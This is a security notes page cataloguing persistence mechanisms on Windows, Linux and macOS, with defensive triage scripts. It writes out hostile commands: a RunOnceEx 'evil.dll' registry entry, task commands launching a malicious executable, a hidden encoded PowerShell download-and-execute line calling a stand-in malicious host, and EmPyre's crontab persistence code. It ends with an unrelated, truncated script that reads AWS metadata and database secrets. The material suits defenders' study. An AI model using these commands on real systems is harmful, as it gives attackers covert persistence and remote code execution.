
Techniques

Created: 10.05.2023

This is about … .


Active Setup (Not yet processed)

Startup

Windows

The list of locations (folders and registry keys) that could be abused for persistence and escalation:

  • current user's Startup folder: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (default)
  • all users' Startup folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp (default)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (default)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce (default)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (default)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce (default)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell 
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows (run when any user logs on)
  • multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
  • Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.
  • Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.
  • Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.
    • Winlogon\Notify - points to notification package DLLs that handle Winlogon events
    • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
    • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
  • HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages, HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages - DLLs listed here are loaded into the LSA process space, so they have access to unencrypted password information.

📘 BTFM

autorunsc -v [options] > result.csv
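As an added example (not from the page and not Sysinternals code), the triage logic for merged autorunsc output: it stacks rows from several hosts by (location, entry, image path), then flags entries that are rare across the fleet, carry an unverified signer, run from a user-writable path, or sit in one of the sensitive locations listed above (RunOnceEx, Winlogon, BootExecute, LSA packages, time providers, print monitors). The CSV is a constructed sample using a subset of the autorunsc -c columns with a Host column prepended, which is an assumption about how the per-host result files were merged.

```python
import csv
import io

# Constructed sample in the shape of merged `autorunsc -c` output from three hosts.
# Column subset and the prepended Host column are assumptions; the values are not real findings.
SAMPLE_CSV = r"""Host,Entry Location,Entry,Enabled,Category,Signer,Image Path
WS01,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe
WS02,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe
WS03,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe
WS02,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend,1,enabled,Logon,(Not verified),c:\temp\updater.dll
WS03,HKLM\SYSTEM\CurrentControlSet\Control\Lsa,Authentication Packages,enabled,LSA Providers,(Verified) Microsoft Windows,c:\windows\system32\msv1_0.dll
WS01,HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OneSync,enabled,Logon,(Not verified),c:\users\alice\appdata\roaming\sync\onesync.exe
"""

# Lower-case fragments of the autostart locations this page calls out as high-value
SENSITIVE_LOCATIONS = ("runonceex", "\\winlogon", "bootexecute", "\\control\\lsa",
                       "timeproviders", "print\\monitors", "print processors")
# Path fragments a standard user can normally write to
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\tmp\\", "\\programdata\\", "\\appdata\\")


def load_rows(csv_text):
    return list(csv.DictReader(io.StringIO(csv_text)))


def stack(rows):
    """Map (location, entry, image path) -> set of hosts carrying it (stacking across the fleet)."""
    hosts = {}
    for r in rows:
        key = (r["Entry Location"].lower(), r["Entry"].lower(), r["Image Path"].lower())
        hosts.setdefault(key, set()).add(r["Host"])
    return hosts


def triage(csv_text, min_hosts=2):
    """Return one finding per row that trips at least one rule; clean rows produce nothing."""
    rows = load_rows(csv_text)
    prevalence = stack(rows)
    findings = []
    for r in rows:
        key = (r["Entry Location"].lower(), r["Entry"].lower(), r["Image Path"].lower())
        loc, image, signer = key[0], key[2], r["Signer"].strip()
        reasons = []
        if len(prevalence[key]) < min_hosts:
            reasons.append("rare: present on %d host(s)" % len(prevalence[key]))
        if not signer.startswith("(Verified)"):
            reasons.append("unsigned or unverified signer")
        if any(frag in image for frag in USER_WRITABLE):
            reasons.append("image in user-writable path")
        if any(frag in loc for frag in SENSITIVE_LOCATIONS):
            reasons.append("sensitive autostart location")
        if reasons:
            findings.append({"host": r["Host"], "location": r["Entry Location"],
                             "entry": r["Entry"], "image": r["Image Path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CSV):
        print(f["host"], f["entry"], "->", "; ".join(f["reasons"]))
```

The three SecurityHealth rows are identical on all hosts, verified and in System32, so they never surface; the RunOnceEx\Depend entry trips all four rules at once, which is the kind of row to look at first.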

Linux

/etc/systemd/system  
/usr/lib/systemd/system 
/etc/init*

macOS

Login Items

System Preferences -> Users & Groups -> Login Items. Additional: SDF podcast.

How to determine whether an item is malicious? The only sure way is to reverse engineer it, but that is time consuming, so you need to narrow down the candidates first. There are a couple of indicators that are commonly seen in malware.

Login items run within the user’s desktop session, inheriting the user’s permissions, and start automatically at user login. Due to this afforded persistence, Mac malware will commonly install itself as a login item. You can find examples of this technique in malware like Kitm, NetWire, and WindTail. Wardle, Patrick. The Art of Mac Malware (p. 24). No Starch Press. Kindle Edition.

❗️ macOS doesn’t readily show the full path to a persisted login item in its interface (unless you hover over the item for a few seconds)

👻 backgroundtaskmanagementagent is a daemon that runs in the background and manages login items. The list of items is stored in a file ⚙️ named backgrounditems.btm.

Programming persistence

⚙️ LSSharedFileListCreate (returns the reference to the list) -> LSSharedFileListInsertItemURL (adds a new item, requires a full path to the item).

To view the APIs used, run nm WindTail/Final_Presentation.app/Contents/MacOS/usrnode. Seeing the above two APIs in the output suggests this persistence mechanism was used by the binary.

🥷🏼 (stealthy) SMLoginItemSetEnabled - see the “Modern Login Items” blog post or Apple’s documentation on the topic. It allows application-specific helper login items, which don’t show up in the Preferences. Those items are stored in the LoginItems subdirectory of the application’s bundle.

Boot

Windows

Flashing BIOS

Update BIOS with the malicious code included. More here.

Boot execute

Not sure what that means (https://www.tenable.com/plugins/nessus/70615). Could be these keys:

  • 🔑 HKLM\System\CurrentControlSet\Control\ServiceControlManagerExtension
  • 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute
  • 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\Execute
  • 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\S0InitialCommand
  • 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\SetupExecute

Services

Windows

🔑 HKLM\SYSTEM\CurrentControlSet\Services. The executable needs to contain the service-specific code and have the permissions required for service behaviour; there are three options to accomplish that:

  1. New service. If the Start value = 0x2 (see 🔑 above), the service starts at boot. Example 🦠: APT1, RIP listener service. ⚒️ sc [queryex|qc|qprivs|qtriggerinfo].
  2. Hijacking, aka Replacement. Requires modifying an existing service, usually a rarely used one. Example 🦠: GlassRAT.
  3. Service failure recovery. Load something 🦠 bad when something good and service-like 👼 crashes. You can define what to do if a certain service crashes; usually it’s restarting the service, but this setting can be changed to launch another executable. ⚒️ Kansa PowerShell Framework (Get_SvcFail.ps1 script), event logs.

Kansa has several scripts to stack services. You can also use the general one:

.\Get-LogparserStack.ps1 -FilePattern *SvcAll.csv -Delimiter "," -Direction asc -OutFile SvcAll-workstation-stack.csv

To do the same job with PowerShell:

# Collect every Kansa SvcAll.csv (one per host) into a single array
$csvFiles = Get-ChildItem -Path ".\*SvcAll.csv"
$result = @()

foreach ($csvFile in $csvFiles) {
    $data = Import-Csv -Path $csvFile.FullName
    $result += $data
}

# Show the column names once, to confirm the fields used below exist
$result[0] | Get-Member -MemberType NoteProperty | Select-Object Name

# Stack by service name + binary path; rare combinations (low Count) are the outliers worth reviewing.
# Group-Object returns GroupInfo objects, so PathName and the host list must be read from $_.Group.
$groupedData = $result | Group-Object -Property Name, PathName |
    Select-Object Count,
        @{Name="Name";     Expression={$_.Group[0].Name}},
        @{Name="PathName"; Expression={$_.Group[0].PathName}},
        @{Name="PC";       Expression={($_.Group.PSComputerName | Sort-Object -Unique) -join ";"}} |
    Sort-Object Count

$groupedData | Export-Csv -Path "result.csv" -NoTypeInformation

Linux

Unused services. To disable a service:

sudo systemctl stop <servicename>
sudo systemctl disable <servicename>

macOS

⚙️ The most relevant keys in a plist would be the following:

  1. Label
  2. ProgramArguments
  3. RunAtLoad - persistence.
  4. KeepAlive / PathState (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)
  5. StartCalendarInterval (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)

👻 launchd process is responsible for running these items. 📚 Reference: A Launch tutorial, https://www.launchd.info/; “Getting Started with Launchd for Sys Admins,” Penn State MacAdmins Conference 2012, https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf.

An example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC ...>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.foo.bar</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/user/launchItem</string>
        <string>argument 1</string>
        <string>argument 2</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

Wardle, Patrick. The Art of Mac Malware (p. 27). No Starch Press. Kindle Edition.

Agents

Run once the user is logged in. They do not have root permissions and may interact with the user session.

The plists can be found here:

/Library/LaunchAgents 
~/Library/LaunchAgents

# to read the file run
plutil -p <path to plist>
defaults read <path to plist>

Daemons

They usually run before the user logs in. Do not require user interaction. They run with 👑 root permissions.

The plists can be found here:

/Library/LaunchDaemons

# to read the file run
plutil -p <path to plist>
defaults read <path to plist>
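An added example (not the page’s or Apple’s code) that does for triage what plutil -p does for display: it parses a launchd plist with Python’s plistlib, reports which of the keys listed above make the job start on its own (RunAtLoad, KeepAlive, StartInterval, StartCalendarInterval, WatchPaths, QueueDirectories), and flags a program outside system paths, a KeepAlive/PathState trigger, or DYLD_* variables set through EnvironmentVariables. The two plists are constructed samples (the second mirrors the com.foo.bar example above); the trusted-prefix list is an assumption to tune per fleet, and scan() walks the LaunchAgents/LaunchDaemons directories named above.

```python
import glob
import os
import plistlib

# Directories named in the Agents and Daemons sections above
LAUNCH_DIRS = ("/Library/LaunchAgents", os.path.expanduser("~/Library/LaunchAgents"), "/Library/LaunchDaemons")
# Keys that make launchd start the job without the user doing anything
TRIGGER_KEYS = ("RunAtLoad", "KeepAlive", "StartInterval", "StartCalendarInterval", "WatchPaths", "QueueDirectories")
# Where the executed binary is expected to live for system/vendor jobs (assumption; tune per fleet)
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")

# Constructed sample plists; neither is a real file. The second mirrors the com.foo.bar example
# above and adds a KeepAlive/PathState trigger plus a DYLD_INSERT_LIBRARIES environment variable.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.nightly</string>
  <key>ProgramArguments</key><array><string>/usr/libexec/example-nightly</string></array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>3</integer><key>Minute</key><integer>0</integer></dict>
</dict></plist>"""

SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.foo.bar</string>
  <key>ProgramArguments</key><array><string>/Users/user/launchItem</string><string>argument 1</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><dict><key>PathState</key><dict><key>/tmp/trigger</key><true/></dict></dict>
  <key>EnvironmentVariables</key><dict><key>DYLD_INSERT_LIBRARIES</key><string>/tmp/inject.dylib</string></dict>
</dict></plist>"""


def audit_plist(data):
    """Parse one launchd plist (bytes) and return label, program, autostart triggers and review flags."""
    d = plistlib.loads(data)
    args = d.get("ProgramArguments") or []
    program = d.get("Program") or (args[0] if args else "")
    triggers = [k for k in TRIGGER_KEYS if k in d]
    flags = []
    if program and not program.startswith(TRUSTED_PREFIXES):
        flags.append("program outside system paths: " + program)
    keep = d.get("KeepAlive")
    if isinstance(keep, dict) and "PathState" in keep:
        flags.append("KeepAlive/PathState trigger on " + ", ".join(keep["PathState"]))
    env = d.get("EnvironmentVariables") or {}
    dyld = sorted(k for k in env if k.startswith("DYLD_"))
    if dyld:
        flags.append("DYLD_* variables injected into the process: " + ", ".join(dyld))
    return {"label": d.get("Label", ""), "program": program, "triggers": triggers, "flags": flags}


def scan(dirs=LAUNCH_DIRS):
    """Audit every .plist under the launchd directories that exist on this machine."""
    results = []
    for d in dirs:
        for path in sorted(glob.glob(os.path.join(d, "*.plist"))):
            try:
                with open(path, "rb") as fh:
                    results.append((path, audit_plist(fh.read())))
            except Exception as exc:  # unreadable file or malformed plist: record, don't abort the sweep
                results.append((path, {"error": str(exc)}))
    return results


if __name__ == "__main__":
    print(audit_plist(SUSPECT_PLIST))
    for path, result in scan():
        print(path, result)
```

plistlib also reads binary plists, so the same function works on files that plutil would otherwise have to convert first.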



## Libs

### Windows

For some of the injection techniques (low-level ones), see the [injections](/docs/reverse/malware-analysis/injections) article.

#### DLL Sideloading

Following is the search order for modern Windows systems:

1. Manifest (if the application provides an absolute path to the `dll`)
2. A module with the same name already loaded in memory is reused; no search is done.
3. DLLs in the same directory as the executable that loads it
4. `KnownDLLs` list: `HKLM\SYSTEM\CurrentControlSet\Control\WOW` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`. If the dll is in the list, the reference from the registry is used, and no search is conducted.
5. Application's loading directory
6. `C:\Windows\System32`
7. `C:\Windows\system`
8. `C:\Windows`
9. Application's registered App Paths directories ❓
10. `PATH` env variable

> ❗️ If a DLL has dependencies, the system searches for the dependent DLLs as if they were loaded with just their module names. This is true even if the first DLL was loaded by specifying a full path. [[1](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)] So, that means that we can make a side-loading attack on "a side-loaded `dll`"!

> ❓Not sure about the different paths specified for the KnowDlls entries. This might be due to the different OS versions. See [here](http://stuff.is-a-geek.net/OnlineDocs/Microsoft/NTmisc/Troubleshooting%20NTVDM%20and%20WOW%20startup%20problems.htm):
> 
> For 16-bit apps, Windows NT uses KnownDLLs to implicitly and explicitly load DLLs. The value is at `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WOW`. At this key, `KnownDLLs` is a type `REG_SZ` value which lists the 8.3 DLL names, separated by spaces. Without a `KnownDLLs` entry, `WOW` searches: 
> 1. The current directory.
> 2. The `%SystemRoot%` directory.
> 3. The `%SystemRoot%\SYSTEM` directory.
> 4. The `%SystemRoot%\SYSTEM32` directory.
> 5. The `.exe` file directory.
> 6. The directories in your `Path` environment variable.

With the KnownDLLs entry, WOW only searches the %SystemRoot%\SYSTEM32 directory.

The order depends also on the `SafeDllSearchMode` (🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode`).  Here is the quote from the [docs](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications):

> If **SafeDllSearchMode** is enabled ✅, the search order is as follows:
> 1. The directory from which the application loaded.
> 2. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
> 3. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
> 4. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
> 5. **The current directory.**
> 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
>
> If **SafeDllSearchMode** is disabled ⛔️, the search order is as follows:
> 1. The directory from which the application loaded.
> 2. **The current directory.**
> 3. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
> 4. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
> 5. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
> 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
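To make the two orders above concrete, here is an added example (not Microsoft's code, and not a model of every loader rule: it ignores manifests, SxS and DLL redirection). It builds the directory list for either SafeDllSearchMode setting, resolves a DLL name against a constructed file-system map, and lists the user-writable directories the loader consults before it reaches the real DLL, which is the exposure a defender wants to know when deciding whether to enforce the setting or pin the working directory. Paths, the PRESENT map and the WRITABLE set are constructed; the KnownDLLs handling follows the note above that such DLLs are taken from the system directory without a search.

```python
from pathlib import PureWindowsPath


def search_order(app_dir, cwd, system_dir, windows_dir, path_dirs, safe_mode=True):
    """Directory order from the quoted docs; the 16-bit system directory is <windows>\\system."""
    sys16 = str(PureWindowsPath(windows_dir) / "system")
    if safe_mode:
        return [app_dir, system_dir, sys16, windows_dir, cwd] + list(path_dirs)
    return [app_dir, cwd, system_dir, sys16, windows_dir] + list(path_dirs)


def resolve(dll, order, present, known_dlls=(), system_dir=None):
    """Where would the loader find `dll`?  Returns (directory, position) or (None, None).
    `present` is a set of (directory, dll) pairs, lower-cased, standing in for the file system.
    KnownDLLs come from the system directory without any search, so their position is None."""
    name = dll.lower()
    if name in {k.lower() for k in known_dlls}:
        return system_dir, None
    for pos, d in enumerate(order):
        if (d.lower(), name) in present:
            return d, pos
    return None, None


def exposed_dirs(dll, order, present, writable, known_dlls=(), system_dir=None):
    """Directories consulted *before* the real DLL is reached that a standard user can write to.
    An empty list means no search-order exposure for this DLL under this configuration."""
    found, pos = resolve(dll, order, present, known_dlls, system_dir)
    if found is not None and pos is None:          # KnownDLL: never searched
        return []
    candidates = order if found is None else order[:pos]   # missing DLL: every directory is consulted
    writable_lower = {w.lower() for w in writable}
    return [d for d in candidates if d.lower() in writable_lower]


# Constructed layout (not a real host): an application in Program Files, started with the user's
# Downloads folder as current directory, and one user-writable tool directory on PATH.
APP = r"C:\Program Files\App"
CWD = r"C:\Users\alice\Downloads"
SYS32 = r"C:\Windows\System32"
WIN = r"C:\Windows"
TOOLS = r"C:\Tools"
PRESENT = {(SYS32.lower(), "version.dll")}   # the only copy of version.dll lives in System32
WRITABLE = {CWD, TOOLS}
SAFE = search_order(APP, CWD, SYS32, WIN, [TOOLS], safe_mode=True)
UNSAFE = search_order(APP, CWD, SYS32, WIN, [TOOLS], safe_mode=False)

if __name__ == "__main__":
    for label, order in (("SafeDllSearchMode on", SAFE), ("SafeDllSearchMode off", UNSAFE)):
        print(label, "version.dll ->", resolve("version.dll", order, PRESENT),
              "exposed:", exposed_dirs("version.dll", order, PRESENT, WRITABLE))
    print("missing fxsst.dll, safe mode, exposed:", exposed_dirs("fxsst.dll", SAFE, PRESENT, WRITABLE))
```

With the safe order, version.dll is found in System32 before the current directory is ever consulted; with the setting disabled, the user's Downloads folder is searched first. A DLL that exists nowhere (the phantom DLL case discussed on this page) exposes every writable directory in the list regardless of the setting.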

Side-by-side (SxS) loading is the mechanism for introducing updated versions of a DLL. It can be used to circumvent anti-virus. Example: PlugX RAT. A legitimately signed `exe` uses SxS to load a malicious `dll`: the attacker puts a nefarious `dll` somewhere along the search path to make sure it's loaded instead of the legitimate one.

📚 **References**: Read more [here](https://businessinsights.bitdefender.com/tech-explainer-what-is-dll-sideloading). 

#### Phantom DLL hijacking

An executable tries to load a very old `dll` that is no longer needed; some of them don't even exist anymore, for example, `fxsst.dll`. The attacker just creates a dll with the same name and some nefarious functionality, and the loader picks it up.

### macOS

#### Dylibs Environment Variables

```bash
DYLD_*
DYLD_INSERT_LIBRARIES # all libs from this env will be loaded
DYLD_FRAMEWORK_PATH
```

These libraries are loaded inside a trusted host process, so no new process is created.

In a launch item's plist the variables are set under EnvironmentVariables; for an application, under LSEnvironment in its Info.plist.

Proxying

Hijacking

Tasks

Windows

C:\Windows\Tasks\*.job
C:\Windows\SchedLgU.txt
C:\Windows\System32\Tasks

at.exe (deprecated but can still be used) and schtasks.exe. For at, see at*.job and SchedLgU.txt; for schtasks, see the Task Scheduler and Security event logs. WinXP: at jobs run with SYSTEM privileges. Files are created in \Windows\Tasks and \Windows\System32\Tasks (XML duplicate on Win7+). Created with: at.exe 22:22:22 C:\mal.exe or schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe.

📕 RTFM

An attempt to be stealthy.

powershell -W Hidden -nop -noni -ec <base64something> # Neither a PowerShell window nor the output will be shown. The script to execute is base64 encoded.
# W    WindowStyle = Hidden
# nop  NoProfile: does not load the PS profile
# noni NonInteractive: no interactive prompt is presented to the user

# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')
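The detection counterpart, as an added example (not from the page): given a process command line, decode the -e/-ec/-enc/-EncodedCommand payload (base64 of UTF-16LE, which is why the same script looks different from plain base64 of ASCII) and flag the hidden-window, no-profile and non-interactive switches plus download-and-execute markers in the decoded text. The sample command line is constructed inside the block by encoding a script that points at the reserved example.invalid domain; the marker list is a starting point, not a complete signature set.

```python
import base64
import re

# Constructed sample lines (the command-line field of a process-creation event); not real telemetry.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/file')"
SAMPLE = "powershell -W Hidden -nop -noni -ec " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")
BENIGN = r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"

# Spellings PowerShell accepts for -EncodedCommand, followed by the base64 blob
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Content markers worth a second look once the script is decoded
MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile", "webclient", "frombase64string")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -e/-ec/-enc/-EncodedCommand, or None if the line has none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not valid base64 / not UTF-16: treat as absent
        return None


def flag(cmdline):
    """(reasons, decoded_script) for one command line; reasons is empty for unremarkable invocations."""
    low = cmdline.lower()
    reasons = []
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        reasons.append("hidden window")
    if re.search(r"-nop(?:rofile)?\b", low):
        reasons.append("profile skipped")
    if re.search(r"-noni(?:nteractive)?\b", low):
        reasons.append("non-interactive")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        d = decoded.lower()
        reasons.extend("decoded script contains " + m for m in MARKERS if m in d)
    return reasons, decoded


if __name__ == "__main__":
    for line in (SAMPLE, BENIGN):
        print(line[:60], "...", flag(line))
```

The switches alone are weak signals (plenty of admin scripts use -NoProfile); the decoded script content is what turns the line into an alert.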

Linux

/etc/cron*  
/var/spool/crontabs 
/var/spool/atjobs  
/etc/anacron

macOS

Cron

/usr/bin/crontab. The post-exploitation red-team tool EmPyre has a module that uses this technique:

import subprocess
cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()

The cat and echo commands append the new command. The %s in the cmd variable will be updated at runtime with the path of the item to persist, and the 0 * * * * component instructs macOS to execute the job every hour. The crontab - will reinstall any existing jobs, along with the new one.
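An added example (not from the page or from EmPyre) of the defender's side of the same crontab: parse crontab -l output and flag jobs that run at boot or at least hourly, pipe a download into an interpreter, or live in user-writable or hidden directories. The crontab text is a constructed sample; the rules are a starting point for review, not an allowlist.

```python
import re

# Constructed `crontab -l` output for a single user; not from a real host.
SAMPLE_CRONTAB = """# m h dom mon dow command
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/periodic-backup --quiet
0 * * * * /Users/user/Library/.cache/update
*/5 * * * * curl -s http://example.invalid/x | sh
@reboot /usr/local/bin/legit-agent
"""

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|python3?)\b")
USER_WRITABLE = re.compile(r"(^|\s)(/tmp/|/var/tmp/|/users/|/home/)")
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")


def parse_crontab(text):
    """Split crontab lines into {"schedule", "command"}; comments, blanks and VAR=value lines are skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                      # @reboot, @hourly, ... take a single field
            sched, _, cmd = line.partition(" ")
        else:                                         # five time fields, the rest is the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        jobs.append({"schedule": sched, "command": cmd.strip()})
    return jobs


def runs_at_least_hourly(sched):
    """True for @reboot/@hourly and for any five-field schedule whose hour field is '*'."""
    if sched.startswith("@"):
        return sched in ("@reboot", "@hourly")
    return sched.split()[1] == "*"


def audit_crontab(text):
    """Return [(command, reasons)] for jobs matching any rule; ordinary jobs produce no entry."""
    findings = []
    for job in parse_crontab(text):
        cmd, low = job["command"], job["command"].lower()
        reasons = []
        if runs_at_least_hourly(job["schedule"]):
            reasons.append("runs at boot or at least hourly")
        if PIPE_TO_SHELL.search(low):
            reasons.append("downloads and pipes into an interpreter")
        if USER_WRITABLE.search(low) or HIDDEN_DIR.search(cmd):
            reasons.append("command lives in a user-writable or hidden directory")
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    for cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(cmd, "->", "; ".join(reasons))
```

Run it over crontab -l for every user (and the files under /etc/cron* and /var/spool/cron) to get one review list per host; the nightly backup in /usr/bin never appears.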

At

At jobs are stored in the /private/var/at/jobs/ directory; enumerate them via the /usr/bin/atq utility.

❗️ On a default install of macOS, the at scheduler, /usr/libexec/atrun, is disabled. However, malware can enable it with 👑 root privileges with the following command: launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist.

After enabling this scheduler, malware can create an at job by simply piping persistent commands into /usr/bin/at, specifying the time and date of execution.

Not a popular technique.

Periodic

/etc/periodic

Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals. “What is the difference between ‘periodic’ and ‘cron’ on OS X?” https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/

Login and Logout Hooks

Look for either LoginHook or LogoutHook in the following plist:

~/Library/Preferences/com.apple.loginwindow.plist

📕 RTFM

#!/bin/bash
export FILENAME=$(date +"%s")
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' http://169.254.169.254/latest/api/token)
export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
